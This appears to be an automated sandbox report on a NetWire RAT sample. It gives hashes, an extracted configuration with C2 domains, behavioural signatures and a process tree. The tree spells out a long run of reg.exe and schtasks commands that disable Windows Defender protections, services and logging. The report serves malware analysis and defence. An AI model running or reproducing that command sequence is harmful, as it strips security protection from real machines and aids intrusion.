Analysis

  • max time kernel: 131s
  • max time network: 135s
  • platform: windows10-2004_x64
  • resource: win10v2004-20250314-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 20/04/2025, 01:09

General

  • Target: 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
  • Size: 22.0MB
  • MD5: 2a26ed689a49e2b3cfd71901147f8303
  • SHA1: d49d9e9e8b0e10a4429a64dde1a0974bc414c819
  • SHA256: 00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
  • SHA512: 9dfd5314841394af05efbd2d8d995bea3921f83971472168a7bd0c789c94f95932fb117052caa8641ac902e1d942503edccb5536463a7fd65e8bdcb17d62e294
  • SSDEEP: 393216:XA/VQ0ppRcqLGEx1HEApai9u+5Snh5NQluiffTIS:XNYR8I2AblM5qgifUS

Malware Config

Extracted

  • Family: netwire
  • C2:
    maelus.mine.nu:3650
    victoire.dyndns.biz:3650
  • Attributes
    • activex_autorun: false
    • copy_executable: false
    • delete_original: false
    • host_id: first spread
    • keylogger_dir: %AppData%\Logs\
    • lock_executable: false
    • offline_keylogger: true
    • password: 0000
    • registry_autorun: false
    • use_mutex: false

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NetWire RAT payload 6 IoCs
  • Netwire

    Netwire is a RAT whose main functionality is focused on password stealing and keylogging; it also includes remote control capabilities.

  • Netwire family
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 12 IoCs
  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
      "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4004
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4684
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
          PID:4560
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender DisableAntiSpyware settings
          PID:4764
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          4⤵
          PID:1728
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          4⤵
          PID:3840
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:1092
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:6096
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:5288
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4388
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:6072
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          4⤵
          PID:536
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          4⤵
          PID:1572
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          4⤵
          PID:1308
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          4⤵
          PID:4312
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          4⤵
          PID:5456
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          4⤵
          PID:1356
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          4⤵
          PID:5932
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          4⤵
          PID:4688
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          4⤵
          PID:5220
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          4⤵
          PID:728
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          4⤵
          PID:3748
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          4⤵
          PID:944
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          4⤵
          PID:3680
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:5376
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:3240
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:2676
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies Security services
          PID:4880
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies Security services
          PID:1192
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies Security services
          PID:1496
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies Security services
          PID:1648
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies security service
          PID:2880
    • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
      "C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Maps connected drives based on registry
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4336
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3408
      • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:4884
    • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
      "C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Maps connected drives based on registry
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1080
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4792
      • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:6108
    • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
      "C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"
      2⤵
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Maps connected drives based on registry
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4508
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4692
      • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:4420
      • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:3720
    • C:\Users\Admin\AppData\Roaming\nb662-full.exe
      "C:\Users\Admin\AppData\Roaming\nb662-full.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      PID:4672

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat (3KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\GetFLE.ini (934B)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\InstallOptions.dll (14KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\LangDLL.dll (5KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\System.dll (11KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UAC.dll (14KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UserInfo.dll (4KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\cpudesc.dll (4KB)
  • C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\nsDialogs.dll (9KB)
  • C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp (1KB)
  • C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp (1KB)
  • C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp (1KB)
  • C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe (1.2MB)
  • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe (91KB)
  • C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe (1.2MB)
  • C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe (1.2MB)
  • C:\Users\Admin\AppData\Roaming\nb662-full.exe (12.2MB)

                                          16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4

                                          SHA512

                                          20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d

                                        • memory/1080-276-0x00000000063D0000-0x000000000641C000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/1080-60-0x00000000052C0000-0x0000000005864000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/1080-53-0x00000000002E0000-0x000000000041A000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/1080-51-0x000000007297E000-0x000000007297F000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1080-94-0x0000000004CB0000-0x0000000004CBA000-memory.dmp

                                          Filesize

                                          40KB

                                        • memory/1080-278-0x0000000006490000-0x00000000064F6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1080-62-0x0000000004D10000-0x0000000004DA2000-memory.dmp

                                          Filesize

                                          584KB

                                        • memory/3720-295-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/3720-297-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4336-96-0x00000000056E0000-0x00000000056FC000-memory.dmp

                                          Filesize

                                          112KB

                                        • memory/4336-301-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-97-0x00000000057A0000-0x000000000583C000-memory.dmp

                                          Filesize

                                          624KB

                                        • memory/4336-54-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-114-0x0000000072970000-0x0000000073120000-memory.dmp

                                          Filesize

                                          7.7MB

                                        • memory/4336-55-0x0000000000860000-0x000000000099C000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/4336-95-0x0000000006480000-0x00000000069AC000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/4336-275-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4508-277-0x0000000006290000-0x00000000062DC000-memory.dmp

                                          Filesize

                                          304KB

                                        • memory/4508-59-0x00000000001F0000-0x000000000032A000-memory.dmp

                                          Filesize

                                          1.2MB

                                        • memory/4884-290-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4884-293-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/6108-292-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/6108-288-0x0000000000400000-0x0000000000425000-memory.dmp

                                          Filesize

                                          148KB